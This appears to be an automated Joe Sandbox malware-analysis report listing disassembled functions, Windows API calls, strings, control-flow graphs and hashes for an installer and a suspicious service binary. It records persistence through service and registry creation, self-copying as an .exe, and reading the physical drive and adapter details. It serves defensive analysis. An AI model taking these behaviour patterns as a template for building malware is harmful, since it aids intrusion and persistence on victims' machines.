                                                                                      • API ID: Value$EnumQuery
                                                                                      • String ID: Inno Setup: No Icons
                                                                                      • API String ID: 1576479698-2016326496
                                                                                      • Opcode ID: 0890946b5df0c49e4954d7290b96ce305c787ba9704d15fe4295c439bd8e9102
                                                                                      • Instruction ID: 08e9f6bdc79701da45a7e076aae250b208fcb3010747ef376bcb555be2d5621c
                                                                                      • Opcode Fuzzy Hash: 0890946b5df0c49e4954d7290b96ce305c787ba9704d15fe4295c439bd8e9102
                                                                                      • Instruction Fuzzy Hash: F5018431B8933069F73045266D41F6B558C9B85B64F65003BFA41AA3C0D6DCDC45E26A
                                                                                      APIs
                                                                                        • Part of subcall function 00453FD0: GetCurrentProcess.KERNEL32(00000028), ref: 00453FDF
                                                                                        • Part of subcall function 00453FD0: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00453FE5
                                                                                      • SetForegroundWindow.USER32(?), ref: 00491FF3
                                                                                      Strings
                                                                                      • Restarting Windows., xrefs: 00491FD0
                                                                                      • Not restarting Windows because Uninstall is being run from the debugger., xrefs: 0049201E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentForegroundOpenTokenWindow
                                                                                      • String ID: Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.
                                                                                      • API String ID: 3179053593-4147564754
                                                                                      • Opcode ID: 92e7afcc8831688dae5fd262e04e4039765fdd7336fda1d0c24d127371dd9238
                                                                                      • Instruction ID: 09758fc62953ac5564f253f86018d0961132e27bbb4a61923f7fbbecd85c55b8
                                                                                      • Opcode Fuzzy Hash: 92e7afcc8831688dae5fd262e04e4039765fdd7336fda1d0c24d127371dd9238
                                                                                      • Instruction Fuzzy Hash: 7701BC747042807AEB01EB65EA02B9C2FA89B4430DF80407BF500AB293C6BD9A49C72D
                                                                                      APIs
                                                                                        • Part of subcall function 00406EB8: DeleteFileA.KERNEL32(00000000,00496628,00492DAD,00000000,00492E02,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406EC3
                                                                                      • MoveFileA.KERNEL32(00000000,00000000), ref: 00471456
                                                                                        • Part of subcall function 004712A8: GetLastError.KERNEL32(00000000,00471394,?,?,?,00497138,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0047141B,00000001), ref: 004712C9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$DeleteErrorLastMove
                                                                                      • String ID: DeleteFile$MoveFile
                                                                                      • API String ID: 3195829115-139070271
                                                                                      • Opcode ID: 51569406b8907aa8f27be33c1290f694066cffae2399f79e6ee197169eb5c4fe
                                                                                      • Instruction ID: 498d1f86d5cab30c0c02f2f8960253c4d30b0e1e307aae4f7005b10ea634dfd9
                                                                                      • Opcode Fuzzy Hash: 51569406b8907aa8f27be33c1290f694066cffae2399f79e6ee197169eb5c4fe
                                                                                      • Instruction Fuzzy Hash: 3AF062A010411067DF107B6E85836DA239C8F0235EB54C17BBD88BF3A3CA3D9C0287AE
                                                                                      APIs
                                                                                      • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00455C42
                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,.2I,?), ref: 00455C4F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: Time$File$LocalSystem
                                                                                      • String ID: .2I
                                                                                      • API String ID: 1748579591-803348413
                                                                                      • Opcode ID: aba8b51db9d65da12f539ddc2c0835b2624d8a3471dbf7fd6520d9ecd032998b
                                                                                      • Instruction ID: 4f8a786cf5642c40ef90ebfca535d25145d1c27a2836ec24ad6e1980779010cb
                                                                                      • Opcode Fuzzy Hash: aba8b51db9d65da12f539ddc2c0835b2624d8a3471dbf7fd6520d9ecd032998b
                                                                                      • Instruction Fuzzy Hash: B7E0ED71D0060DABCF00EBE5DC418EEB7BCFA08314F40067BA814E3295E734A6098B94
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.3269065213.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269174342.0000000000494000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269199437.0000000000496000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000001.00000002.3269217231.00000000004A6000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_tOniaJ21lj.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLastSleep
                                                                                      • String ID:
                                                                                      • API String ID: 1458359878-0
                                                                                      • Opcode ID: 8b4360f2b479ea038ec97fb2a00d6f0221d541355e91bee91f30916643827583
                                                                                      • Instruction ID: 017d81aa95838fcb6bb112513f86caaf4ff52444f8b7b5a451e770b39712fdff
                                                                                      • Opcode Fuzzy Hash: 8b4360f2b479ea038ec97fb2a00d6f0221d541355e91bee91f30916643827583
                                                                                      • Instruction Fuzzy Hash: B8F0F632A00524578E20A9AE998192F62CDDAC0B6D730052BEF04DF283D439CC854AAE

                                                                                      Execution Graph

                                                                                      Execution Coverage: 6%
                                                                                      Dynamic/Decrypted Code Coverage: 0%
                                                                                      Signature Coverage: 4.1%
                                                                                      Total number of Nodes: 460
                                                                                      Total number of Limit Nodes: 8
3430 40d42d 3428->3430 3431 40d483 GetTickCount 3430->3431 3431->3429 3614 4023b3 RegisterServiceCtrlHandlerA 3615 4023d6 3614->3615 3616 4024cc 3614->3616 3617 4023e4 SetServiceStatus GetLastError CreateEventA 3615->3617 3618 40245d SetServiceStatus CreateThread WaitForSingleObject CloseHandle 3617->3618 3619 40243e GetLastError 3617->3619 3620 4024c3 SetServiceStatus 3618->3620 3619->3620 3620->3616 3434 40d639 RegSetValueExA 3440 40d23a RegOpenKeyExA 3441 40d24b 3440->3441 3492 40d07a 3493 40daa7 LoadLibraryExA 3492->3493 3442 40da3b 3443 40d475 3442->3443 3444 40da42 3443->3444 3445 40d661 RegCloseKey 3443->3445 3446 40d955 RegQueryValueExA 3445->3446 3446->3443 3503 40263c SetEvent 3504 40d397 3503->3504 3621 4022bc 3622 402823 wsprintfA 3621->3622 3494 40227f GetProcAddress 3495 4026ae 3494->3495 3554 4026ff 3555 402704 RegCreateKeyExA 3554->3555

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
                                                                                      • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                                                      • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                                                      • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                                      • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                                      • API String ID: 514930453-3667123677
                                                                                      • Opcode ID: a3c77d1947fac9ed500e02c632cb5410261389502922d6f95d8c76429a6c9e05
                                                                                      • Instruction ID: 2fcbbae68a7f2e143e0ba6fa3878dab2488d9b05c73812711a2b91e8578584ab
                                                                                      • Opcode Fuzzy Hash: a3c77d1947fac9ed500e02c632cb5410261389502922d6f95d8c76429a6c9e05
                                                                                      • Instruction Fuzzy Hash: E521A770904109AEEF119B65CD447EF7BB8EF41344F1440BAD504B22E1E7789985CB69

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 26 401a4f-401a77 CreateFileA 27 401b45-401b4a 26->27 28 401a7d-401a91 26->28 29 401a98-401ac0 DeviceIoControl 28->29 30 401ac2-401aca 29->30 31 401af3-401afb 29->31 34 401ad4-401ad9 30->34 35 401acc-401ad2 30->35 32 401b04-401b07 31->32 33 401afd-401b03 call 402ce6 31->33 38 401b09-401b0c 32->38 39 401b3a-401b44 FindCloseChangeNotification 32->39 33->32 34->31 36 401adb-401af1 call 402d00 call 4018cc 34->36 35->31 36->31 42 401b27-401b34 call 402cd8 38->42 43 401b0e-401b17 GetLastError 38->43 39->27 42->29 42->39 43->39 45 401b19-401b1c 43->45 45->42 49 401b1e-401b24 45->49 49->42
                                                                                      APIs
                                                                                      • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                                                      • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                                                      • GetLastError.KERNEL32 ref: 00401B0E
                                                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 00401B3D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
                                                                                      • String ID: \\.\PhysicalDrive0
                                                                                      • API String ID: 3786717961-1180397377
                                                                                      • Opcode ID: 87e5aa96cf8bbfa53ba141c063bc04efd036a70200bde10c5f99651d25558048
                                                                                      • Instruction ID: 04828827cee311aa1ccd055820d70034eb57b3ddca3c9d8c28a7d5788a1782d0
                                                                                      • Opcode Fuzzy Hash: 87e5aa96cf8bbfa53ba141c063bc04efd036a70200bde10c5f99651d25558048
                                                                                      • Instruction Fuzzy Hash: 43318D71D00118EADB21AFA5CD849EFBBB9FF41750F20407AE554B22A0E7785E45CB98

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 167 402299-4022a1 StartServiceCtrlDispatcherA 168 402931-402937 167->168
                                                                                      APIs
                                                                                      • StartServiceCtrlDispatcherA.ADVAPI32 ref: 0040229A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CtrlDispatcherServiceStart
                                                                                      • String ID:
                                                                                      • API String ID: 3789849863-0
                                                                                      • Opcode ID: c003d29a70a172e29de59ed7b689d9b07ce4a3aef7e76657a3f1d292d186b6c5
                                                                                      • Instruction ID: 7236fdf905961642a5bbbc3fb68be642bec8eaa1085a8ac3c622be18bd149764
                                                                                      • Opcode Fuzzy Hash: c003d29a70a172e29de59ed7b689d9b07ce4a3aef7e76657a3f1d292d186b6c5
                                                                                      • Instruction Fuzzy Hash: 55B0127330C10446C30057B8BE4C59F234CE38633AB104C37C04FE00E1D6B8C04A5524

                                                                                      Control-flow Graph

                                                                                      APIs
                                                                                      • GetVersion.KERNEL32 ref: 00402F16
                                                                                        • Part of subcall function 00404034: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F4F,00000000), ref: 00404045
                                                                                        • Part of subcall function 00404034: HeapDestroy.KERNEL32 ref: 00404084
                                                                                      • GetCommandLineA.KERNEL32 ref: 00402F64
                                                                                      • GetStartupInfoA.KERNEL32(?), ref: 00402F8F
                                                                                      • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402FB2
                                                                                        • Part of subcall function 0040300B: ExitProcess.KERNEL32 ref: 00403028
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                      • String ID: Y
                                                                                      • API String ID: 2057626494-4136946213
                                                                                      • Opcode ID: 2a5b16c506521380fd9b5f66b06519665ea10880a1b1eb47f363de886a19e373
                                                                                      • Instruction ID: 31bd938ea51fadde60a3d0ec437c396cd65a6e637b97124abe794e54387ab133
                                                                                      • Opcode Fuzzy Hash: 2a5b16c506521380fd9b5f66b06519665ea10880a1b1eb47f363de886a19e373
                                                                                      • Instruction Fuzzy Hash: 19216DB1800615AAD714AFA6DE49A6E7FB8EB44719F10413FF505BB2D1DB385500CA58

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 79 402845-40d446 call 402db0 GetCommandLineW CommandLineToArgvW GetLocalTime call 401f27 88 40d8a7 79->88 89 40d44c-40d451 79->89 90 40dba7 88->90 89->90 91 40dbaa 90->91 91->91
                                                                                      APIs
                                                                                      • GetCommandLineW.KERNEL32(?), ref: 004028F2
                                                                                      • CommandLineToArgvW.SHELL32(00000000), ref: 004028F9
                                                                                      • GetLocalTime.KERNEL32(0040C2B8), ref: 0040D3C6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CommandLine$ArgvLocalTime
                                                                                      • String ID: /chk$XiM#
                                                                                      • API String ID: 3768950922-2768313731
                                                                                      • Opcode ID: 58e77e24c0e44735d9c25947b9bd7a71b097def894af762cde97e617ba063816
                                                                                      • Instruction ID: f8a697a6ba56cfa0421d3161c88fb5920d4a750ed1aa0ba2803a0c5cf8bd7934
                                                                                      • Opcode Fuzzy Hash: 58e77e24c0e44735d9c25947b9bd7a71b097def894af762cde97e617ba063816
                                                                                      • Instruction Fuzzy Hash: 59E06D75C08202EEC7007BE0AF098AC77B4AA08301320817FE556B51D0CB7C548AAB2F

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 92 40250e-402510 93 402512-402526 92->93 94 402574-4025e7 92->94 95 402501-402507 93->95 96 402528-40253d 93->96 98 40d955-40d960 RegQueryValueExA 94->98 95->92 99 40da3c 98->99 100 40da42 99->100 101 40d475-40d66c RegCloseKey 99->101 103 40da44 100->103 101->98 103->103
                                                                                      APIs
                                                                                      • RegQueryValueExA.KERNELBASE(?,Common AppData), ref: 0040D958
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: QueryValue
                                                                                      • String ID: Common AppData$NL5$
                                                                                      • API String ID: 3660427363-3642351906
                                                                                      • Opcode ID: ed0e5acd8f8ece743e598616439700d4f440e59f7496dd527ca1e1139eb0ac89
                                                                                      • Instruction ID: 3625f9f7bcec903c70c52d49b5d04ab8b5a9762ab31523acee7a4a548b3f6f63
                                                                                      • Opcode Fuzzy Hash: ed0e5acd8f8ece743e598616439700d4f440e59f7496dd527ca1e1139eb0ac89
                                                                                      • Instruction Fuzzy Hash: 6A019971C18B40FBCB054FB09E18A697F74AB46710715427BD851720F1D3B8885BEA4F

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 104 40d3ab-40d3ad 105 40d3c6-40d3cc GetLocalTime call 401f27 104->105 106 40d3af-40d3c3 104->106 108 40d3d1-40d446 105->108 106->105 111 40d8a7 108->111 112 40d44c-40d451 108->112 113 40dba7 111->113 112->113 114 40dbaa 113->114 114->114
                                                                                      APIs
                                                                                      • GetLocalTime.KERNEL32(0040C2B8), ref: 0040D3C6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: LocalTime
                                                                                      • String ID: /chk$XiM#
                                                                                      • API String ID: 481472006-2768313731
                                                                                      • Opcode ID: 719ccb32c6d0f1224c08b4e1637f7109be7b56e533cc931ac7d4392f13334026
                                                                                      • Instruction ID: bfeb034239b7c7118683ac587487231c4a8ae608a4ee2d3b9eda992131e4dc08
                                                                                      • Opcode Fuzzy Hash: 719ccb32c6d0f1224c08b4e1637f7109be7b56e533cc931ac7d4392f13334026
                                                                                      • Instruction Fuzzy Hash: 4CE08630C18743E9D7117BA0CD088987FB1AB51314760463FE1A2754E1D73D549AEF4E

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 115 40364d-403657 116 403659-403664 GetCurrentProcess TerminateProcess 115->116 117 40366a-403680 115->117 116->117 118 403682-403689 117->118 119 4036be-4036d2 call 4036e6 117->119 121 40368b-403697 118->121 122 4036ad-4036bd call 4036e6 118->122 128 4036e4-4036e5 119->128 129 4036d4-4036de ExitProcess 119->129 125 403699-40369d 121->125 126 4036ac 121->126 122->119 130 4036a1-4036aa 125->130 131 40369f 125->131 126->122 130->125 130->126 131->130
                                                                                      APIs
                                                                                      • GetCurrentProcess.KERNEL32(?,?,00403638,?,00000000,00000000,00402FC7,00000000,00000000), ref: 0040365D
                                                                                      • TerminateProcess.KERNEL32(00000000,?,00403638,?,00000000,00000000,00402FC7,00000000,00000000), ref: 00403664
                                                                                      • ExitProcess.KERNEL32 ref: 004036DE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                      • String ID:
                                                                                      • API String ID: 1703294689-0
                                                                                      • Opcode ID: 45a62d5989472daa66da51cc5c0c53ccf8c07e521785adc499b880c08e76b42c
                                                                                      • Instruction ID: 8ec911347a9f6ebe748c774e3fffa0e274c2dea28e60d441966e3dc67073ffcc
                                                                                      • Opcode Fuzzy Hash: 45a62d5989472daa66da51cc5c0c53ccf8c07e521785adc499b880c08e76b42c
                                                                                      • Instruction Fuzzy Hash: A201C831644300FAD6309F25FE84A5A7FA8A791351B10493FE440723D1CB3AA9848E1C

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 132 40269d-4026a9 CreateDirectoryA 133 40d1b2-40d61b call 402dc0 * 2 132->133
                                                                                      APIs
                                                                                      • CreateDirectoryA.KERNELBASE ref: 0040269D
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateDirectory
                                                                                      • String ID: .exe
                                                                                      • API String ID: 4241100979-4119554291
                                                                                      • Opcode ID: 6ff648dc406feb637f11e3f6b69f0d8219d4dba7ac56d197b0b02803ca9b4c05
                                                                                      • Instruction ID: 7be0dad2239628ad1372a9b2e638fdce078da6a21a9524e3c9378f4dc9fd0076
                                                                                      • Opcode Fuzzy Hash: 6ff648dc406feb637f11e3f6b69f0d8219d4dba7ac56d197b0b02803ca9b4c05
                                                                                      • Instruction Fuzzy Hash: CFC04C38596131F2D51132D10E0EE5F641C5D8E745334403F7142700D349FC180A56BF

                                                                                      Control-flow Graph

                                                                                      control_flow_graph 139 404034-404052 HeapCreate 140 404054-404061 call 403eec 139->140 141 40408a-40408c 139->141 144 404070-404073 140->144 145 404063-40406e call 40440b 140->145 147 404075 call 404c5c 144->147 148 40408d-404090 144->148 151 40407a-40407c 145->151 147->151 151->148 152 40407e-404084 HeapDestroy 151->152 152->141
                                                                                      APIs
                                                                                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F4F,00000000), ref: 00404045
                                                                                        • Part of subcall function 00403EEC: GetVersionExA.KERNEL32 ref: 00403F0B
                                                                                      • HeapDestroy.KERNEL32 ref: 00404084
                                                                                        • Part of subcall function 0040440B: HeapAlloc.KERNEL32(00000000,00000140,0040406D,000003F8), ref: 00404418
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocCreateDestroyVersion
                                                                                      • String ID:
                                                                                      • API String ID: 2507506473-0
                                                                                      • Opcode ID: 785e23c1ed37029bd7fa1e4a136f418f238003ec06b3befa2c01f286c825b2ce
                                                                                      • Instruction ID: 795a75c142ce263548137c971673ec0d69254cf7c95aacf64765c85fef2462b4
                                                                                      • Opcode Fuzzy Hash: 785e23c1ed37029bd7fa1e4a136f418f238003ec06b3befa2c01f286c825b2ce
                                                                                      • Instruction Fuzzy Hash: E9F065F060530199DB205F749F45B2A35989BC0765F10453FFB40F41D0EB788481990E

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 153 402571-402579 RegCreateKeyExA 154 40d427 153->154 155 40d8a7-40dba7 154->155 156 40d42d-40d48c call 402c80 GetTickCount 154->156 161 40dbaa 155->161 156->155 161->161
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountCreateTick
                                                                                      • String ID:
                                                                                      • API String ID: 3069548982-0
                                                                                      • Opcode ID: ee8128013bf5e90e42cdd554de5022e84e0101b2628d331728f9b3f566d64dcf
                                                                                      • Instruction ID: ea209166fb0ef528cf99b9c0e38baeae1227fb332146ce63fc0e23087ad075ce
                                                                                      • Opcode Fuzzy Hash: ee8128013bf5e90e42cdd554de5022e84e0101b2628d331728f9b3f566d64dcf
                                                                                      • Instruction Fuzzy Hash: FCD05EB1D08109DBD7605BE0EE4EAE932785B04308F54403BEA8AF10C0DA7C955DA91E

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 162 40225a-40d90c call 402dc0 CopyFileA
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: CopyFile
                                                                                      • String ID:
                                                                                      • API String ID: 1304948518-0
                                                                                      • Opcode ID: 8747868f841f3e86c60c04198b4c3812247f9f6c6e6f8a051b3cab23d1bc53d8
                                                                                      • Instruction ID: 18315759b2a842b5bc47b7c566bd7707562d10a9491666b6158da95836141683
                                                                                      • Opcode Fuzzy Hash: 8747868f841f3e86c60c04198b4c3812247f9f6c6e6f8a051b3cab23d1bc53d8
                                                                                      • Instruction Fuzzy Hash: 7DC08CB0C14109EAC2105AA19E4A9AA3B6C4B0038CB2000B7720BB1081EA3C854EA67B

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 169 40d23a-40d245 RegOpenKeyExA 170 40da42 169->170 171 40d24b 169->171 172 40da44 170->172 171->170 172->172
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: Open
                                                                                      • String ID:
                                                                                      • API String ID: 71445658-0
                                                                                      • Opcode ID: 31de8d22fc593bc1c279bc5476df20698ba11a3bbf33a6183a20eb6f6725d707
                                                                                      • Instruction ID: 8040d302770a520428a66105e482caf9ceff3af2c13684b85fe4baa54a86378e
                                                                                      • Opcode Fuzzy Hash: 31de8d22fc593bc1c279bc5476df20698ba11a3bbf33a6183a20eb6f6725d707
                                                                                      • Instruction Fuzzy Hash: 47C09B30708406CDE7555BB14A082B77764B644344B704D76E44BF05D0F739850F591E

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 173 40d11d-40d126 OpenSCManagerA 174 40d8ee 173->174
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.2035155574.000000000040B000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2035155574.0000000000400000.00000040.00000001.01000000.00000008.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_400000_recordpadsoundrecorder32.jbxd
                                                                                      Similarity
                                                                                      • API ID: ManagerOpen
                                                                                      • String ID:
                                                                                      • API String ID: 1889721586-0
                                                                                      • Opcode ID: 86451105a0139d872ac9f7691e3aa5979c091675fabf703e7b9c18d13448488a
                                                                                      • Instruction ID: 5b145c32185f2fe23c23a9f3356da1e15a91333f529c69de665c0df8320d1f6d
                                                                                      • Opcode Fuzzy Hash: 86451105a0139d872ac9f7691e3aa5979c091675fabf703e7b9c18d13448488a
                                                                                      • Instruction Fuzzy Hash: C8B01270C05101FECB506F604F9801C35665500305330487AD103F10D0C73C4509FA2E

